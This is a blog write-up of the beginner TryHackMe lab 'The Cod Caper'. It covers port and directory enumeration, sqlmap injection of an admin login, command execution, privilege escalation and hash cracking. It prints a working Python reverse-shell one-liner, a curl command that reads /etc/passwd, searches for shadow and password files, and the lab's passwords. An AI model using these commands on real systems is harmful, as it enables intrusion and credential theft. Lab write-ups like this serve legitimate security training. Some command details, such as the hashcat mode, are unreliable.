The Cod Caper (TryHackMe) — A Write-Up

FOREWORD: We all get stuck which is why write-ups exist however, I would suggest you try your best to come up with the correct answer before seeking the answer. Most problems are meant to be solved but a process must be followed which is why I explain the various steps/commands used in order to arrive at a solution. Do your best ! Enjoy the process !

The Cod Caper

This Room is a beginner friendly room that allows users to infiltrate and exploit a Linux based system.

[ Task 1 — Intro ]

No answer Needed

[ Task 2 — Host Enumeration ]

The objective of this task is to obtain as much information about any open ports on the gievn machine.

Useful flags :

FlagUse-pUsed to specify which port to analyze. This can also be used to specify a range of ports i.e -p 1–1000-sVRuns default scripts on the port, used for doing basic analysis on services running on a port-AAggressive mode, obtains all related information

How many ports are open on the target machine?

To get this result an nmap scan must be done on all ports on the given IP address. Following the guide provided, I came up with nmap -p 1-1000 -sC -A <GIVEN IP ADDRESS> which provides the following output and the answers to all of the questions in this section

From the given output it is determined that there are 2 open ports on the target machine.

What is the http-title of the web server?

Apache2 Ubuntu Default Page: It works

What version is the ssh service?

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

What is the version of the web server?

Apache/2.4.18

[ Task 3 — Web Enumeration ]

The objective of this task is to research the web server for any vulnerabilites using the gobuster tool which is a brute force tool.

Recommended tool: gobuster

FlagUse-xSpecifies file extensions such as php,txt,html-uSpecifies which URL to use-tSpecifies the number of CPU threads to be used — wordlistSpecifies which world list is appended to the url path such as "http://url.com/word1" “http://url.com/word2"dirSpecifies directory to be enumerated

The objective of this task is simple. The goal is to familiarize the user with useful commands needed to navigate servers in order to locate potential vulnerabilities.

What is the name of the important file on the server?

From the previous excersise using nmap I found that port 80 is open on the machine. So I checked in the browser using the given IP which leads us to the default page.

With this information I am now able to use the Kali Gobuster tool to enumerate the directories.

When I combined the given flags with the given IP address (gobuster dir -u <GIVEN IP ADDRESS> --wordlist /usr/share/wordlists/dirb/common.txt -x html,php,txt) with the wordlist common.txt I came up with the following result :

Based off the output administrator.php seems to be an important file that would contain valuable information that could be exploited.

Reference

Kali Gobuster Tool

[ Task 4 — Web Exploitation ]

For this task the objective is to successfully crack the password to the administrator account SQLinjection, an open-sourced tool used to exploit servers.

FlagUse-uSpecifies the URL to be attacked — formsUsed to autoomaticaly select the parameters — dumpUsed to retrieve all data once the SQLI is found-aRetrieves all information from the database

What is the admin username?

A SQL injection must be done to obtain this information using related commands and sqlmap. I used sqlmap -u http://<GIVEN IP ADDRESS>/administrator.php --forms --dump which gives this result and access to the website :

What is the admin password?

Using the output from the previous task we get secretpass

How many forms of SQLI is the form vulnerable to?

Once we are able to access the site we are brought to a command prompt screen. To find the number of vulnerabilites I simply re-used the command I used in question 1 WITHOUT the — dump option since we are only looking for the amount of vulnerabilites. sqlmap -u http://10.10.220.130/administrator.php --forms provides an ouptut of 3 SQLI forms.

[ Task 5 — Command Execution ]

Thai section requires research to determine if the users old account is active. If it is we are needing to find if specific files remain.

How many files are in the current directory?

I obtained this answer by utilizing the ls function on the command screen that we gained access to from the previous excersise. The following output shows that there are 3 files:

Do I still hvae an account?

To begin you need to open up a listening port using netcat on your machine nc -lnvp 1234

Reverse shell is needed to perform the command neccessary to solve this problem. I used python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<GIVEN IP ADDRESS>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I used curl -s — data-urlencode “cmd=cat /etc/passwd” -X POST http://PROVIDED IP ADDRESS/2591c98b70119fe624898b1e424b5e91.php | grep -v -e "^$" | grep -v "<" .I used the curl command since we are transferring data and the flags needed to obtain the answer: yes

As you can see “Pingu” is still listed as an account.

What is my SSH password?

So we figured out that Pingu still has an account. Now, we have to figure out the associated password. To do this we will need to use the find command to search through all of the files owned by Pingu. My first thought was to use the find command to search for any shadow files may contain passwords. find / 2>>/dev/null | grep -i shadow.

I found a backup shadow directory! Lets use cat to see the contents!

This didn’t help. Next, I used the find command to search any content containing "pass" find / 2>>/dev/null | grep -i pass (I switched to the webpage interface for this one ) This is what populates:

/var/hidden/pass! Let's cat into this directory.

We found the password pinguapingu!

References

netcat
sqlmap
Python — Reverse Shell
curl

[ Task 6 — LinEnum ]

In this task the objective is to use LinEnum to download LinEnum and use it for priviledge escalation. First, I used ssh and the login information obtained from the previous task to login as Pingu. *ssh pingu@<GIVEN IP ADDRESS>

Next I used the function find / -perm -u=s -type f 2>/dev/null to locate the SUID which gace me this:

A secret path? Sounds very interesting to me! /opt/secret/root

Reference

LinEnum SUID

The next few tasks go over tools that can be used to carry out “Binary Exploitation”. Everyone has their own way of doing things so various exploitation methods are explained. There are no tasks to be completed but there is a lot of information to retain and use for hte final tasks.

[ Task 7 — pwndbg ]

No answer needed

[ Task 8 — Binary-Exploitaion: Manually ]

No answer needed

Reference

Disassemble Shell

[ Task 9 — Binary Exploitation: The pwntools way ]

No answer needed

Reference

pwnTools

[ Task 10 — Finishing The Job ]

This task requires us to crack the root hash using the hash we received from the previous task $6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.It is recommended that we use the following hashcat {flags} {hashfile} {wordlist} with the following flags :

I copied the hash and saved it as a llama.txt. Now I am going to attempt cracking the file using hashcat -m 0 -a 0 -o llama.txt /usr/share/wordlists/rockyou.txt . Let's see what we get! FYI This may take a while

FlagUse-aUsed to specify attack mode-mUsed to specify which mode to use

Got it ! love2fish

References

Hashcat Hashcat Hashcat Modes

This room was a bit difficult for and took me longer than I expected. I spent a lot of time researching various tools and commands that I found myself unfamiliar with. However in the end I completed it which is all that matters!

Congratulations on completing The Cod Caper !

--

--

--

Non-conforming Cybermaiden. Techie living in Atlanta.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to Compile the Linux Kernel from Source

Start chats, build communities and manage easier contacts on ALTER

Java Serializable interface for beginner

REST of the future!

PATROLING PEOPLE.

Nanit’s Gangnam Style

Exception Aggregation — a new validation pattern

CS373 Fall 2021: Blog 7

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Synackodes

Synackodes

Non-conforming Cybermaiden. Techie living in Atlanta.

More from Medium

Hack the Box — Beep Writeup

HackTheBox Writeup — Previse

HackTheBox Unicode Write-Up

Unicode Avatar

TryHackMe: [Day 6] Web Exploitation Patch Management Is Hard